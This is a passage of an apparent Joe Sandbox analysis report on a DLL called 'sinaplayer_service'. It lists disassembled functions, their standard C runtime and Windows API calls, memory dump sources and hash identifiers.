                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free$Concurrency@@Exception$??0exception@std@@??1_??1event@Collection@details@Destroy@@H_prolog3TaskThrow__uncaught_exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 721984979-0
                                                                                                                                                                                                    • Opcode ID: 095689682b93920fc118978bc36b70fce02d1962dbbecb94d59149e88684d10c
                                                                                                                                                                                                    • Instruction ID: d38e45f06b4fbea04c49a82b527501e26d86741f360d90089bac9b7a8f2bca49
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 095689682b93920fc118978bc36b70fce02d1962dbbecb94d59149e88684d10c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F21152B0C096039BFF009F62C4427FD73B0BF01354BA2091C9E716B5A0CB34A953CA84
                                                                                                                                                                                                    Function 6D0AF894 Relevance: 12.1, APIs: 8, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,?,?), ref: 6D0AF8A0
                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,?,?), ref: 6D0AF8C3
                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,?,?,?), ref: 6D0AF8DB
                                                                                                                                                                                                    • _errno.MSVCR120(?,?), ref: 6D0DEEB7
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0DEEC9
                                                                                                                                                                                                    • __dosmaperr.LIBCMT(00000000), ref: 6D0DEED0
                                                                                                                                                                                                    • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,?,?,?), ref: 6D0DEEE3
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?), ref: 6D0DEEE5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: FilePointer$_errno$ErrorLast__dosmaperr_get_osfhandle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2017882077-0
                                                                                                                                                                                                    • Opcode ID: 49598a0eed627ddafa5c3622783affb68aca319f5e34ef9216d978ecdda580ef
                                                                                                                                                                                                    • Instruction ID: e2c69b415ba32ba3259575809db41c05f58e1c5b3a89082f68ed072e98fef813
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49598a0eed627ddafa5c3622783affb68aca319f5e34ef9216d978ecdda580ef
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB11E33261431ABFFB019AA8DC80FBE777CAB46720F110255F924AB1D1DBB0E8008764
                                                                                                                                                                                                    Function 6D0EEC43 Relevance: 12.1, APIs: 8, Instructions: 64COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6D0EEC4E
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6D0EEC59
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6D0EEC62
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Mean.LIBCMT ref: 6D0EEC6C
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6D0EECC1
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::MeasuredHistory::Variance.LIBCMT ref: 6D0EECCC
                                                                                                                                                                                                    • _CIsqrt.MSVCR120(?,?,?,?), ref: 6D0EECD7
                                                                                                                                                                                                    • _CIexp.MSVCR120(?,?,?,?), ref: 6D0EECE3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::Hill$History::Measured$HistoryMeanVariance$IexpIsqrt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3578402837-0
                                                                                                                                                                                                    • Opcode ID: 2780f5c1e82453fc495b6308699051f1135b20148ffc51c12cf56fe4f93bce92
                                                                                                                                                                                                    • Instruction ID: 82479c6229ca8c995ab4b0c18e74dacc662c50f3c28df7c05adbea78645f752c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2780f5c1e82453fc495b6308699051f1135b20148ffc51c12cf56fe4f93bce92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E112631E0490DEADF116FA1E9441EDBF34FF84295F228890D99076294EF324AB19BC6
                                                                                                                                                                                                    Function 6D0AF910 Relevance: 12.1, APIs: 8, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0AF9A8,00000010), ref: 6D0AF9CC
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE59
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE60
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE6D
                                                                                                                                                                                                      • Part of subcall function 6D094206: EnterCriticalSection.KERNEL32(-0000000C,6D094260,00000008,6D0A02F5,00000000,6D0A0338,00000010,6D0D525C,00000000,00000000,00000001,00000000,00000000,00000000,?,6D0D5D30), ref: 6D09424C
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE77
                                                                                                                                                                                                    • __doserrno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE82
                                                                                                                                                                                                      • Part of subcall function 6D0AF894: _get_osfhandle.MSVCR120(?,?,?), ref: 6D0AF8A0
                                                                                                                                                                                                      • Part of subcall function 6D0AF894: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001,?,?,?), ref: 6D0AF8C3
                                                                                                                                                                                                      • Part of subcall function 6D0AF894: SetFilePointerEx.KERNEL32(00000000,?,?,?,?), ref: 6D0AF8DB
                                                                                                                                                                                                      • Part of subcall function 6D0AF9C4: __unlock_fhandle.LIBCMT ref: 6D0AF9C5
                                                                                                                                                                                                    • _errno.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEE9F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(6D0AF9A8,00000010), ref: 6D0DEEAA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __doserrno$_errno$FilePointer$CriticalEnterSection__unlock_fhandle_get_osfhandle_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2332042503-0
                                                                                                                                                                                                    • Opcode ID: a2f866b9a8686264238e1dcca0097d96738bb08fb09d267c8718ec1561edf0b8
                                                                                                                                                                                                    • Instruction ID: e0771463db116a453b515a9129bce73a3db67ad6b448d31b1e5612117f01a553
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a2f866b9a8686264238e1dcca0097d96738bb08fb09d267c8718ec1561edf0b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E21BC71909711AFF7125FA4C84036DBAB47F42324F574655E9B08F2F2C7F989019B52
                                                                                                                                                                                                    Function 6D121C68 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _errno.MSVCR120(6D121D58,00000014,6D0D5502,00000000,?), ref: 6D121C81
                                                                                                                                                                                                    • _get_osfhandle.MSVCR120(?,6D121D58,00000014,6D0D5502,00000000,?), ref: 6D121CE2
                                                                                                                                                                                                    • FlushFileBuffers.KERNEL32(00000000,6D121D58,00000014,6D0D5502,00000000,?), ref: 6D121CE9
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D121CF3
                                                                                                                                                                                                    • __doserrno.MSVCR120 ref: 6D121D02
                                                                                                                                                                                                    • _errno.MSVCR120(6D121D58,00000014,6D0D5502,00000000,?), ref: 6D121D09
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno$BuffersErrorFileFlushLast__doserrno_get_osfhandle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3142512953-0
                                                                                                                                                                                                    • Opcode ID: 98192f0f8e84af98dcb06a4c28513edd521abd46d1aa549661ac78dc168bdb25
                                                                                                                                                                                                    • Instruction ID: dbda88386b85206939d3f145c1ea6d648ba6e68b9ca131e95cb870f0edf03ece
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98192f0f8e84af98dcb06a4c28513edd521abd46d1aa549661ac78dc168bdb25
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B11EE75D04218CBDB01CFA8D84836D7BB4AF06724B020205F9309F2E6C7F688C09FA1
                                                                                                                                                                                                    Function 6D0F60FA Relevance: 12.0, APIs: 8, Instructions: 49COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,00000000,?,6D0F3443,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F6106
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F6109
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,00000000,?,00000000,?,6D0F3443,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F6112
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F6115
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F611D
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,?,00000000,?,6D0F3443,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F614A
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,00000000,?,00000000,?,6D0F3443,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F6150
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,?,00000000,?,6D0F3443,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F6160
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$Arrayfree$FlushInterlocked
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1505039951-0
                                                                                                                                                                                                    • Opcode ID: 1ef3034b14b1bff37893e23c3ef908378f65d2977467051e5db07c7427af41f9
                                                                                                                                                                                                    • Instruction ID: d456b22425b821584b8ab2d0694758616a1ea1e43c2b28912e3fd701d2a599a0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1ef3034b14b1bff37893e23c3ef908378f65d2977467051e5db07c7427af41f9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71018B31A04622AFFF059FA5C995B6AB7A8FF057503550469EA0197513CF61F813CBD0
                                                                                                                                                                                                    Function 6D0F62B6 Relevance: 12.0, APIs: 8, Instructions: 49COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,?,00000000,?,6D0F348C,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F62C2
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F62C5
                                                                                                                                                                                                    • InterlockedFlushSList.KERNEL32(?,00000000,?,00000000,?,6D0F348C,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F62CE
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F62D1
                                                                                                                                                                                                    • ListArray.LIBCMT ref: 6D0F62D9
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,?,00000000,?,6D0F348C,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F6306
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,00000000,?,00000000,?,6D0F348C,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F630C
                                                                                                                                                                                                    • free.MSVCR120(?,?,00000000,?,00000000,?,6D0F348C,00000004,6D0F3384,00000004,6D0F334D), ref: 6D0F631C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: List$Arrayfree$FlushInterlocked
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1505039951-0
                                                                                                                                                                                                    • Opcode ID: 119034f379b008d7e9171a14902add2ad2edcf404abfa0c7a5861ab9e0664a8f
                                                                                                                                                                                                    • Instruction ID: 5e7c6c466f8650997b82d906beb8978e34e3828b7e38ec6a20b3287068a2b515
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 119034f379b008d7e9171a14902add2ad2edcf404abfa0c7a5861ab9e0664a8f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE01DB31A04A22AFFB05AFA5C895B2ABB78FF053643610429FA1097511CB62F813CBD0
                                                                                                                                                                                                    Function 6D092495 Relevance: 10.7, APIs: 7, Instructions: 220COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,?,?,00000000), ref: 6D092596
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,?,00000000,?), ref: 6D0925BB
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,?,?,00000002), ref: 6D09261B
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,?,?,?), ref: 6D092642
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0E001D
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120 ref: 6D0E002B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4201559322-0
                                                                                                                                                                                                    • Opcode ID: 11c479ff120d8dfbf7ebacdc4b4c2743f2ec1ef3bd6698d0bf42d4c2c83870d1
                                                                                                                                                                                                    • Instruction ID: 479a44717818496dfb3dc57fa0c6ee6fb1c76584bf2c318f352fb0fd042ab4f5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11c479ff120d8dfbf7ebacdc4b4c2743f2ec1ef3bd6698d0bf42d4c2c83870d1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7161C031A18207DBFF258E7988907BB36E4BF49358F91922EFD189B250E731C851DB91
                                                                                                                                                                                                    Function 6D1288C1 Relevance: 10.7, APIs: 7, Instructions: 214COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,00000002,?,?,?,?,6D1288BC,?,?,?,?,?,?,?), ref: 6D12894A
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,?,?,?,?,?,6D1288BC,?,?,?,?,?,?,?), ref: 6D1289B7
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,00000000,?,?,?,?,6D1288BC,?,?,?,?,?,?,?), ref: 6D1289F1
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,00000000,?,?,?,?,?,6D1288BC,?,?,?,?,?,?,?), ref: 6D128A11
                                                                                                                                                                                                    • wcsncpy_s.MSVCR120(?,000000FF,?,?,?,?,?,?,6D1288BC,?,?,?,?,?,?,?), ref: 6D128A30
                                                                                                                                                                                                    • _errno.MSVCR120(?,?,?,?,6D1288BC,?,?,?,?,?,?,?,?,?), ref: 6D128A8F
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(?,?,?,?,6D1288BC,?,?,?,?,?,?,?,?,?), ref: 6D128A9D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcsncpy_s$_errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4201559322-0
                                                                                                                                                                                                    • Opcode ID: c9ef516c6702ad622d6d6640c02258283ebc54bc3a3d96c164f5196a919972a6
                                                                                                                                                                                                    • Instruction ID: 0c0718c0114464797883862b31fbb7bdba21a60b613ae017aa77bb87d5e4adeb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9ef516c6702ad622d6d6640c02258283ebc54bc3a3d96c164f5196a919972a6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7461C731B14207DBEF148E2888906BB36A4FFA5355B11462DED2497288DBF3C8D1C7A6
                                                                                                                                                                                                    Function 6D0C4220 Relevance: 10.7, APIs: 7, Instructions: 187COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __ctrlfp
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1574075368-0
                                                                                                                                                                                                    • Opcode ID: 8641d13f6a8bf279876f1f612e40444a814d9b9f32471e35a96cd527890ded1f
                                                                                                                                                                                                    • Instruction ID: 1d04207f1a17a2435dee9827213cb573e1955fb4a6e7b2e3fa0b5e0c42652752
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8641d13f6a8bf279876f1f612e40444a814d9b9f32471e35a96cd527890ded1f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B05167B0C08A0AEADB116F34D84136EBBB4FF92344F51C75AF4D815094EF7894A6D382
                                                                                                                                                                                                    Function 6D0B3D38 Relevance: 10.7, APIs: 7, Instructions: 157sleepCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ?_SpinOnce@?$_SpinWait@$0A@@details@Concurrency@@QAE_NXZ.MSVCR120(6D0B3D10,00000030,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004,00000006,?,00000000,?,6D0D311E,00000003), ref: 6D0D1C65
                                                                                                                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCMT ref: 6D0D1C77
                                                                                                                                                                                                    • ?_AcquireWrite@_ReaderWriterLock@details@Concurrency@@QAEXXZ.MSVCR120(6D0B3D10,00000030,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004,00000006,?,00000000,?,6D0D311E,00000003), ref: 6D0D1CA1
                                                                                                                                                                                                    • ?_TryAcquireWrite@_ReaderWriterLock@details@Concurrency@@QAE_NXZ.MSVCR120(6D0B3D10,00000030,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004,00000006,?,00000000,?,6D0D311E,00000003), ref: 6D0D1CE9
                                                                                                                                                                                                    • Sleep.KERNEL32(00000001,6D0B3D10,00000030,6D0F2C37,?,?,-00000004,?,6D0EDEB3,-00000004,00000006,?,00000000,?,6D0D311E,00000003), ref: 6D0D1D09
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0D1D3D
                                                                                                                                                                                                    • List.LIBCMT ref: 6D0D1D4C
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
